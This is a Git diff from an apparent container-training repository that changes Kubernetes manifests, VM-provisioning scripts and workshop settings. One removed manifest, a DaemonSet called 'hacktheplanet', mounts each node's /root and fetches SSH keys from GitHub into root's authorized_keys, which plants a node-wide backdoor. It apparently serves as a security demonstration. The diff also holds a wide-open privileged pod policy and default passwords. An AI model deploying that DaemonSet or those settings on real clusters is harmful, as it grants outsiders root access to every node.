Compare commits

12 Commits

| SHA1 |
|---|
| 91ba273488 |
| 2aba4eb6c4 |
| 2dc4b333a9 |
| bacfba01b0 |
| a384cc0602 |
| 9697412346 |
| 1d31573b38 |
| 6be1b1c2d7 |
| 9ab4292a8a |
| a3ef8efaf5 |
| 4c5da9ed0d |
| 6b9b83a7ae |
@@ -1,21 +0,0 @@
apiVersion: enterprises.upmc.com/v1
kind: ElasticsearchCluster
metadata:
  name: es
spec:
  kibana:
    image: docker.elastic.co/kibana/kibana-oss:6.1.3
    image-pull-policy: Always
  cerebro:
    image: upmcenterprises/cerebro:0.7.2
    image-pull-policy: Always
  elastic-search-image: upmcenterprises/docker-elasticsearch-kubernetes:6.1.3_0
  image-pull-policy: Always
  client-node-replicas: 2
  master-node-replicas: 3
  data-node-replicas: 3
  network-host: 0.0.0.0
  use-ssl: false
  data-volume-size: 10Gi
  java-options: "-Xms512m -Xmx512m"
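As a quick orientation (not part of the diff above): a custom resource like this one is normally applied with kubectl once the elasticsearch-operator from the next manifest is running. The commands below are an illustrative sketch; the file name is an assumption, while the resource name `es` and the `elasticsearchclusters` resource type come from the manifests in this comparison.

```bash
# Sketch only: assumes the elasticsearch-operator (next manifest) is already deployed
# and that the ElasticsearchCluster manifest above is saved as elasticsearch-cluster.yaml.
kubectl apply -f elasticsearch-cluster.yaml

# The operator registers a CRD, so the cluster can then be inspected with:
kubectl get elasticsearchclusters
kubectl describe elasticsearchcluster es
```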
@@ -1,94 +0,0 @@
# This is mirrored from https://github.com/upmc-enterprises/elasticsearch-operator/blob/master/example/controller.yaml but using the elasticsearch-operator namespace instead of operator
---
apiVersion: v1
kind: Namespace
metadata:
  name: elasticsearch-operator
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: elasticsearch-operator
rules:
- apiGroups: ["extensions"]
  resources: ["deployments", "replicasets", "daemonsets"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["apiextensions.k8s.io"]
  resources: ["customresourcedefinitions"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["storage.k8s.io"]
  resources: ["storageclasses"]
  verbs: ["get", "list", "create", "delete", "deletecollection"]
- apiGroups: [""]
  resources: ["persistentvolumes", "persistentvolumeclaims", "services", "secrets", "configmaps"]
  verbs: ["create", "get", "update", "delete", "list"]
- apiGroups: ["batch"]
  resources: ["cronjobs", "jobs"]
  verbs: ["create", "get", "deletecollection", "delete"]
- apiGroups: [""]
  resources: ["pods"]
  verbs: ["list", "get", "watch"]
- apiGroups: ["apps"]
  resources: ["statefulsets", "deployments"]
  verbs: ["*"]
- apiGroups: ["enterprises.upmc.com"]
  resources: ["elasticsearchclusters"]
  verbs: ["*"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: elasticsearch-operator
subjects:
- kind: ServiceAccount
  name: elasticsearch-operator
  namespace: elasticsearch-operator
---
apiVersion: extensions/v1beta1
kind: Deployment
metadata:
  name: elasticsearch-operator
  namespace: elasticsearch-operator
spec:
  replicas: 1
  template:
    metadata:
      labels:
        name: elasticsearch-operator
    spec:
      containers:
      - name: operator
        image: upmcenterprises/elasticsearch-operator:0.2.0
        imagePullPolicy: Always
        env:
        - name: NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
        ports:
        - containerPort: 8000
          name: http
        livenessProbe:
          httpGet:
            path: /live
            port: 8000
          initialDelaySeconds: 10
          timeoutSeconds: 10
        readinessProbe:
          httpGet:
            path: /ready
            port: 8000
          initialDelaySeconds: 10
          timeoutSeconds: 5
      serviceAccount: elasticsearch-operator
@@ -1,167 +0,0 @@
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: filebeat-config
  namespace: kube-system
  labels:
    k8s-app: filebeat
data:
  filebeat.yml: |-
    filebeat.config:
      inputs:
        # Mounted `filebeat-inputs` configmap:
        path: ${path.config}/inputs.d/*.yml
        # Reload inputs configs as they change:
        reload.enabled: false
      modules:
        path: ${path.config}/modules.d/*.yml
        # Reload module configs as they change:
        reload.enabled: false

    # To enable hints based autodiscover, remove `filebeat.config.inputs` configuration and uncomment this:
    #filebeat.autodiscover:
    #  providers:
    #    - type: kubernetes
    #      hints.enabled: true

    processors:
      - add_cloud_metadata:

    cloud.id: ${ELASTIC_CLOUD_ID}
    cloud.auth: ${ELASTIC_CLOUD_AUTH}

    output.elasticsearch:
      hosts: ['${ELASTICSEARCH_HOST:elasticsearch}:${ELASTICSEARCH_PORT:9200}']
      username: ${ELASTICSEARCH_USERNAME}
      password: ${ELASTICSEARCH_PASSWORD}
---
apiVersion: v1
kind: ConfigMap
metadata:
  name: filebeat-inputs
  namespace: kube-system
  labels:
    k8s-app: filebeat
data:
  kubernetes.yml: |-
    - type: docker
      containers.ids:
      - "*"
      processors:
        - add_kubernetes_metadata:
            in_cluster: true
---
apiVersion: extensions/v1beta1
kind: DaemonSet
metadata:
  name: filebeat
  namespace: kube-system
  labels:
    k8s-app: filebeat
spec:
  template:
    metadata:
      labels:
        k8s-app: filebeat
    spec:
      serviceAccountName: filebeat
      terminationGracePeriodSeconds: 30
      containers:
      - name: filebeat
        image: docker.elastic.co/beats/filebeat-oss:7.0.1
        args: [
          "-c", "/etc/filebeat.yml",
          "-e",
        ]
        env:
        - name: ELASTICSEARCH_HOST
          value: elasticsearch-es.default.svc.cluster.local
        - name: ELASTICSEARCH_PORT
          value: "9200"
        - name: ELASTICSEARCH_USERNAME
          value: elastic
        - name: ELASTICSEARCH_PASSWORD
          value: changeme
        - name: ELASTIC_CLOUD_ID
          value:
        - name: ELASTIC_CLOUD_AUTH
          value:
        securityContext:
          runAsUser: 0
          # If using Red Hat OpenShift uncomment this:
          #privileged: true
        resources:
          limits:
            memory: 200Mi
          requests:
            cpu: 100m
            memory: 100Mi
        volumeMounts:
        - name: config
          mountPath: /etc/filebeat.yml
          readOnly: true
          subPath: filebeat.yml
        - name: inputs
          mountPath: /usr/share/filebeat/inputs.d
          readOnly: true
        - name: data
          mountPath: /usr/share/filebeat/data
        - name: varlibdockercontainers
          mountPath: /var/lib/docker/containers
          readOnly: true
      volumes:
      - name: config
        configMap:
          defaultMode: 0600
          name: filebeat-config
      - name: varlibdockercontainers
        hostPath:
          path: /var/lib/docker/containers
      - name: inputs
        configMap:
          defaultMode: 0600
          name: filebeat-inputs
      # data folder stores a registry of read status for all files, so we don't send everything again on a Filebeat pod restart
      - name: data
        hostPath:
          path: /var/lib/filebeat-data
          type: DirectoryOrCreate
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: filebeat
subjects:
- kind: ServiceAccount
  name: filebeat
  namespace: kube-system
roleRef:
  kind: ClusterRole
  name: filebeat
  apiGroup: rbac.authorization.k8s.io
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: filebeat
  labels:
    k8s-app: filebeat
rules:
- apiGroups: [""] # "" indicates the core API group
  resources:
  - namespaces
  - pods
  verbs:
  - get
  - watch
  - list
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: filebeat
  namespace: kube-system
  labels:
    k8s-app: filebeat
---
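The manifest above deploys Filebeat as a DaemonSet in `kube-system`. As an illustrative sketch (not part of the diff), one way to check that a log shipper came up on every node and can reach Elasticsearch:

```bash
# Assumes the manifest above was applied as-is.
kubectl -n kube-system get daemonset filebeat
kubectl -n kube-system get pods -l k8s-app=filebeat -o wide

# Tail one shipper's own logs to confirm it connects to the configured output:
kubectl -n kube-system logs daemonset/filebeat --tail=20
```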
@@ -1,34 +0,0 @@
apiVersion: apps/v1
kind: DaemonSet
metadata:
  name: hacktheplanet
spec:
  selector:
    matchLabels:
      app: hacktheplanet
  template:
    metadata:
      labels:
        app: hacktheplanet
    spec:
      volumes:
      - name: root
        hostPath:
          path: /root
      tolerations:
      - effect: NoSchedule
        operator: Exists
      initContainers:
      - name: hacktheplanet
        image: alpine
        volumeMounts:
        - name: root
          mountPath: /root
        command:
        - sh
        - -c
        - "apk update && apk add curl && curl https://github.com/bridgetkromhout.keys > /root/.ssh/authorized_keys"
      containers:
      - name: web
        image: nginx
@@ -1,110 +0,0 @@
# This is a local copy of:
# https://github.com/rancher/local-path-provisioner/blob/master/deploy/local-path-storage.yaml
---
apiVersion: v1
kind: Namespace
metadata:
  name: local-path-storage
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: local-path-provisioner-service-account
  namespace: local-path-storage
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRole
metadata:
  name: local-path-provisioner-role
  namespace: local-path-storage
rules:
- apiGroups: [""]
  resources: ["nodes", "persistentvolumeclaims"]
  verbs: ["get", "list", "watch"]
- apiGroups: [""]
  resources: ["endpoints", "persistentvolumes", "pods"]
  verbs: ["*"]
- apiGroups: [""]
  resources: ["events"]
  verbs: ["create", "patch"]
- apiGroups: ["storage.k8s.io"]
  resources: ["storageclasses"]
  verbs: ["get", "list", "watch"]
---
apiVersion: rbac.authorization.k8s.io/v1beta1
kind: ClusterRoleBinding
metadata:
  name: local-path-provisioner-bind
  namespace: local-path-storage
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: local-path-provisioner-role
subjects:
- kind: ServiceAccount
  name: local-path-provisioner-service-account
  namespace: local-path-storage
---
apiVersion: apps/v1beta2
kind: Deployment
metadata:
  name: local-path-provisioner
  namespace: local-path-storage
spec:
  replicas: 1
  selector:
    matchLabels:
      app: local-path-provisioner
  template:
    metadata:
      labels:
        app: local-path-provisioner
    spec:
      serviceAccountName: local-path-provisioner-service-account
      containers:
      - name: local-path-provisioner
        image: rancher/local-path-provisioner:v0.0.8
        imagePullPolicy: Always
        command:
        - local-path-provisioner
        - --debug
        - start
        - --config
        - /etc/config/config.json
        volumeMounts:
        - name: config-volume
          mountPath: /etc/config/
        env:
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
      volumes:
      - name: config-volume
        configMap:
          name: local-path-config
---
apiVersion: storage.k8s.io/v1
kind: StorageClass
metadata:
  name: local-path
provisioner: rancher.io/local-path
volumeBindingMode: WaitForFirstConsumer
reclaimPolicy: Delete
---
kind: ConfigMap
apiVersion: v1
metadata:
  name: local-path-config
  namespace: local-path-storage
data:
  config.json: |-
    {
      "nodePathMap":[
        {
          "node":"DEFAULT_PATH_FOR_NON_LISTED_NODES",
          "paths":["/opt/local-path-provisioner"]
        }
      ]
    }
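The last two objects above define the `local-path` StorageClass backed by the Rancher local-path provisioner. A minimal way to exercise it is sketched below (illustrative only, not part of the diff; the claim name `test-pvc` is made up):

```bash
# Create a PVC against the local-path StorageClass; with
# volumeBindingMode: WaitForFirstConsumer it stays Pending until a pod uses it.
kubectl apply -f - <<EOF
apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: test-pvc
spec:
  storageClassName: local-path
  accessModes: [ ReadWriteOnce ]
  resources:
    requests:
      storage: 1Gi
EOF
kubectl get pvc test-pvc
```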
@@ -1,95 +0,0 @@
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: consul
rules:
- apiGroups: [ "" ]
  resources: [ pods ]
  verbs: [ get, list ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: consul
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: consul
subjects:
- kind: ServiceAccount
  name: consul
  namespace: orange
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: consul
---
apiVersion: v1
kind: Service
metadata:
  name: consul
spec:
  ports:
  - port: 8500
    name: http
  selector:
    app: consul
---
apiVersion: apps/v1
kind: StatefulSet
metadata:
  name: consul
spec:
  serviceName: consul
  replicas: 3
  selector:
    matchLabels:
      app: consul
  volumeClaimTemplates:
  - metadata:
      name: data
    spec:
      accessModes:
      - ReadWriteOnce
      resources:
        requests:
          storage: 1Gi
  template:
    metadata:
      labels:
        app: consul
    spec:
      serviceAccountName: consul
      affinity:
        podAntiAffinity:
          requiredDuringSchedulingIgnoredDuringExecution:
          - labelSelector:
              matchExpressions:
              - key: app
                operator: In
                values:
                - consul
            topologyKey: kubernetes.io/hostname
      terminationGracePeriodSeconds: 10
      containers:
      - name: consul
        image: "consul:1.4.4"
        volumeMounts:
        - name: data
          mountPath: /consul/data
        args:
        - "agent"
        - "-bootstrap-expect=3"
        - "-retry-join=provider=k8s namespace=orange label_selector=\"app=consul\""
        - "-client=0.0.0.0"
        - "-data-dir=/consul/data"
        - "-server"
        - "-ui"
        lifecycle:
          preStop:
            exec:
              command:
              - /bin/sh
              - -c
              - consul leave
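The StatefulSet above relies on Consul's `-retry-join=provider=k8s ...` flag so the three servers can discover each other through the Kubernetes API, which is why the Role/RoleBinding on pods exists. An illustrative way to verify the cluster formed (a sketch; it assumes the manifests were applied in the `orange` namespace, as the RoleBinding suggests):

```bash
# Wait for the three replicas, then ask any server for the member list:
kubectl -n orange rollout status statefulset/consul
kubectl -n orange exec consul-0 -- consul members

# The UI is exposed on port 8500 by the "consul" Service; port-forward to browse it:
kubectl -n orange port-forward service/consul 8500:8500
```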
@@ -1,39 +0,0 @@
---
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
  name: privileged
  annotations:
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: '*'
spec:
  privileged: true
  allowPrivilegeEscalation: true
  allowedCapabilities:
  - '*'
  volumes:
  - '*'
  hostNetwork: true
  hostPorts:
  - min: 0
    max: 65535
  hostIPC: true
  hostPID: true
  runAsUser:
    rule: 'RunAsAny'
  seLinux:
    rule: 'RunAsAny'
  supplementalGroups:
    rule: 'RunAsAny'
  fsGroup:
    rule: 'RunAsAny'
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:privileged
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['privileged']
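A PodSecurityPolicy only takes effect once some subject is allowed to `use` it, which is what the `psp:privileged` ClusterRole above provides. A hedged example of granting it follows; the group name below is the conventional one covering all service accounts and is an assumption, not something defined in this diff:

```bash
# Let every service account in the cluster use the "privileged" policy:
kubectl create clusterrolebinding psp:privileged \
        --clusterrole=psp:privileged \
        --group=system:serviceaccounts
```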
@@ -1,38 +0,0 @@
---
apiVersion: extensions/v1beta1
kind: PodSecurityPolicy
metadata:
  annotations:
    apparmor.security.beta.kubernetes.io/allowedProfileNames: runtime/default
    apparmor.security.beta.kubernetes.io/defaultProfileName: runtime/default
    seccomp.security.alpha.kubernetes.io/allowedProfileNames: docker/default
    seccomp.security.alpha.kubernetes.io/defaultProfileName: docker/default
  name: restricted
spec:
  allowPrivilegeEscalation: false
  fsGroup:
    rule: RunAsAny
  runAsUser:
    rule: RunAsAny
  seLinux:
    rule: RunAsAny
  supplementalGroups:
    rule: RunAsAny
  volumes:
  - configMap
  - emptyDir
  - projected
  - secret
  - downwardAPI
  - persistentVolumeClaim
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: psp:restricted
rules:
- apiGroups: ['policy']
  resources: ['podsecuritypolicies']
  verbs: ['use']
  resourceNames: ['restricted']
@@ -1,33 +0,0 @@
---
apiVersion: v1
kind: ServiceAccount
metadata:
  name: jean.doe
  namespace: users
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: users:jean.doe
rules:
- apiGroups: [ certificates.k8s.io ]
  resources: [ certificatesigningrequests ]
  verbs: [ create ]
- apiGroups: [ certificates.k8s.io ]
  resourceNames: [ users:jean.doe ]
  resources: [ certificatesigningrequests ]
  verbs: [ get, create, delete, watch ]
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: users:jean.doe
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: users:jean.doe
subjects:
- kind: ServiceAccount
  name: jean.doe
  namespace: users
@@ -1,70 +0,0 @@
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node2
  annotations:
    node: node2
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node2
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node3
  annotations:
    node: node3
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node3
---
apiVersion: v1
kind: PersistentVolume
metadata:
  name: consul-node4
  annotations:
    node: node4
spec:
  capacity:
    storage: 10Gi
  accessModes:
  - ReadWriteOnce
  persistentVolumeReclaimPolicy: Delete
  local:
    path: /mnt/consul
  nodeAffinity:
    required:
      nodeSelectorTerms:
      - matchExpressions:
        - key: kubernetes.io/hostname
          operator: In
          values:
          - node4
@@ -229,7 +229,7 @@ EOF"
    pssh "
    if [ ! -x /usr/local/bin/stern ]; then
        ##VERSION##
        sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.11.0/stern_linux_amd64 &&
        sudo curl -L -o /usr/local/bin/stern https://github.com/wercker/stern/releases/download/1.10.0/stern_linux_amd64 &&
        sudo chmod +x /usr/local/bin/stern &&
        stern --completion bash | sudo tee /etc/bash_completion.d/stern
    fi"
@@ -248,14 +248,6 @@ EOF"
        sudo tar -C /usr/local/bin -zx ship
    fi"

    # Install the AWS IAM authenticator
    pssh "
    if [ ! -x /usr/local/bin/aws-iam-authenticator ]; then
        ##VERSION##
        sudo curl -o /usr/local/bin/aws-iam-authenticator https://amazon-eks.s3-us-west-2.amazonaws.com/1.12.7/2019-03-27/bin/linux/amd64/aws-iam-authenticator
        sudo chmod +x /usr/local/bin/aws-iam-authenticator
    fi"

    sep "Done"
}
@@ -318,14 +310,6 @@ _cmd_listall() {
    done
}

_cmd ping "Ping VMs in a given tag, to check that they have network access"
_cmd_ping() {
    TAG=$1
    need_tag

    fping < tags/$TAG/ips.txt
}

_cmd netfix "Disable GRO and run a pinger job on the VMs"
_cmd_netfix () {
    TAG=$1
@@ -399,15 +383,6 @@ _cmd_retag() {
    aws_tag_instances $OLDTAG $NEWTAG
}

_cmd ssh "Open an SSH session to the first node of a tag"
_cmd_ssh() {
    TAG=$1
    need_tag
    IP=$(head -1 tags/$TAG/ips.txt)
    info "Logging into $IP"
    ssh docker@$IP
}

_cmd start "Start a group of VMs"
_cmd_start() {
    while [ ! -z "$*" ]; do
@@ -506,12 +481,12 @@ _cmd_helmprom() {
    if i_am_first_node; then
        kubectl -n kube-system get serviceaccount helm ||
        kubectl -n kube-system create serviceaccount helm
        sudo -u docker -H helm init --service-account helm
        helm init --service-account helm
        kubectl get clusterrolebinding helm-can-do-everything ||
        kubectl create clusterrolebinding helm-can-do-everything \
            --clusterrole=cluster-admin \
            --serviceaccount=kube-system:helm
        sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
        helm upgrade --install prometheus stable/prometheus \
            --namespace kube-system \
            --set server.service.type=NodePort \
            --set server.service.nodePort=30090 \
@@ -31,7 +31,6 @@ infra_start() {
        die "I could not find which AMI to use in this region. Try another region?"
    fi
    AWS_KEY_NAME=$(make_key_name)
    AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}

    sep "Starting instances"
    info " Count: $COUNT"
@@ -39,11 +38,10 @@ infra_start() {
    info " Token/tag: $TAG"
    info " AMI: $AMI"
    info " Key name: $AWS_KEY_NAME"
    info " Instance type: $AWS_INSTANCE_TYPE"
    result=$(aws ec2 run-instances \
        --key-name $AWS_KEY_NAME \
        --count $COUNT \
        --instance-type $AWS_INSTANCE_TYPE \
        --instance-type ${AWS_INSTANCE_TYPE-t2.medium} \
        --client-token $TAG \
        --block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
        --image-id $AMI)
@@ -99,7 +97,7 @@ infra_disableaddrchecks() {
}

wait_until_tag_is_running() {
    max_retry=100
    max_retry=50
    i=0
    done_count=0
    while [[ $done_count -lt $COUNT ]]; do
@@ -1,4 +1,4 @@
#!/usr/bin/env python3
#!/usr/bin/env python
import os
import sys
import yaml
@@ -5,7 +5,7 @@ clustersize: 1
|
||||
clusterprefix: dmuc
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
@@ -21,7 +21,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -5,7 +5,7 @@ clustersize: 3
|
||||
clusterprefix: kubenet
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
@@ -21,7 +21,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -5,7 +5,7 @@ clustersize: 3
|
||||
clusterprefix: kuberouter
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
@@ -21,7 +21,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -5,7 +5,7 @@ clustersize: 3
|
||||
clusterprefix: test
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
cards_template: admin.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
@@ -21,7 +21,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
29
prepare-vms/settings/enix.yaml
Normal file
@@ -0,0 +1,29 @@
|
||||
# Number of VMs per cluster
|
||||
clustersize: 1
|
||||
|
||||
# The hostname of each node will be clusterprefix + a number
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: enix.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: A4
|
||||
|
||||
# Feel free to reduce this if your printer can handle it
|
||||
paper_margin: 0.2in
|
||||
|
||||
# Note: paper_size and paper_margin only apply to PDF generated with pdfkit.
|
||||
# If you print (or generate a PDF) using ips.html, they will be ignored.
|
||||
# (The equivalent parameters must be set from the browser's print dialog.)
|
||||
|
||||
# This can be "test" or "stable"
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
docker_user_password: training
|
||||
|
||||
@@ -23,7 +23,7 @@ paper_margin: 0.2in
|
||||
engine_version: test
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.18.0
|
||||
machine_version: 0.13.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -23,7 +23,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.22.0
|
||||
machine_version: 0.15.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -5,7 +5,7 @@ clustersize: 4
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
cards_template: jerome.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
@@ -21,7 +21,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -7,7 +7,7 @@ clustersize: 3
|
||||
clusterprefix: node
|
||||
|
||||
# Jinja2 template to use to generate ready-to-cut cards
|
||||
cards_template: cards.html
|
||||
cards_template: kube101.html
|
||||
|
||||
# Use "Letter" in the US, and "A4" everywhere else
|
||||
paper_size: Letter
|
||||
@@ -23,7 +23,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.21.1
|
||||
machine_version: 0.14.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -23,7 +23,7 @@ paper_margin: 0.2in
|
||||
engine_version: stable
|
||||
|
||||
# These correspond to the version numbers visible on their respective GitHub release pages
|
||||
compose_version: 1.24.1
|
||||
compose_version: 1.22.0
|
||||
machine_version: 0.15.0
|
||||
|
||||
# Password used to connect with the "docker user"
|
||||
|
||||
@@ -1,20 +1,15 @@
|
||||
#!/bin/sh
|
||||
set -e
|
||||
|
||||
export AWS_INSTANCE_TYPE=t3a.small
|
||||
|
||||
INFRA=infra/aws-us-west-2
|
||||
INFRA=infra/aws-eu-west-3
|
||||
|
||||
STUDENTS=2
|
||||
|
||||
PREFIX=$(date +%Y-%m-%d-%H-%M)
|
||||
|
||||
SETTINGS=admin-dmuc
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
TAG=admin-dmuc
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--settings settings/$TAG.yaml \
|
||||
--count $STUDENTS
|
||||
|
||||
./workshopctl deploy $TAG
|
||||
@@ -22,45 +17,37 @@ TAG=$PREFIX-$SETTINGS
|
||||
./workshopctl kubebins $TAG
|
||||
./workshopctl cards $TAG
|
||||
|
||||
SETTINGS=admin-kubenet
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
TAG=admin-kubenet
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--settings settings/$TAG.yaml \
|
||||
--count $((3*$STUDENTS))
|
||||
|
||||
./workshopctl disableaddrchecks $TAG
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kubebins $TAG
|
||||
./workshopctl disableaddrchecks $TAG
|
||||
./workshopctl cards $TAG
|
||||
|
||||
SETTINGS=admin-kuberouter
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
TAG=admin-kuberouter
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--settings settings/$TAG.yaml \
|
||||
--count $((3*$STUDENTS))
|
||||
|
||||
./workshopctl disableaddrchecks $TAG
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kubebins $TAG
|
||||
./workshopctl disableaddrchecks $TAG
|
||||
./workshopctl cards $TAG
|
||||
|
||||
#INFRA=infra/aws-us-west-1
|
||||
|
||||
export AWS_INSTANCE_TYPE=t3a.medium
|
||||
|
||||
SETTINGS=admin-test
|
||||
TAG=$PREFIX-$SETTINGS
|
||||
TAG=admin-test
|
||||
./workshopctl start \
|
||||
--tag $TAG \
|
||||
--infra $INFRA \
|
||||
--settings settings/$SETTINGS.yaml \
|
||||
--settings settings/$TAG.yaml \
|
||||
--count $((3*$STUDENTS))
|
||||
|
||||
./workshopctl deploy $TAG
|
||||
./workshopctl kube $TAG 1.13.5
|
||||
./workshopctl cards $TAG
|
||||
|
||||
|
||||
124
prepare-vms/templates/admin.html
Normal file
@@ -0,0 +1,124 @@
|
||||
{# Feel free to customize or override anything in there! #}
|
||||
{%- set url = "http://FIXME.container.training" -%}
|
||||
{%- set pagesize = 9 -%}
|
||||
{%- if clustersize == 1 -%}
|
||||
{%- set workshop_name = "Docker workshop" -%}
|
||||
{%- set cluster_or_machine = "machine virtuelle" -%}
|
||||
{%- set this_or_each = "cette" -%}
|
||||
{%- set plural = "" -%}
|
||||
{%- set image_src = "https://s3-us-west-2.amazonaws.com/www.breadware.com/integrations/docker.png" -%}
|
||||
{%- else -%}
|
||||
{%- set workshop_name = "Kubernetes workshop" -%}
|
||||
{%- set cluster_or_machine = "cluster" -%}
|
||||
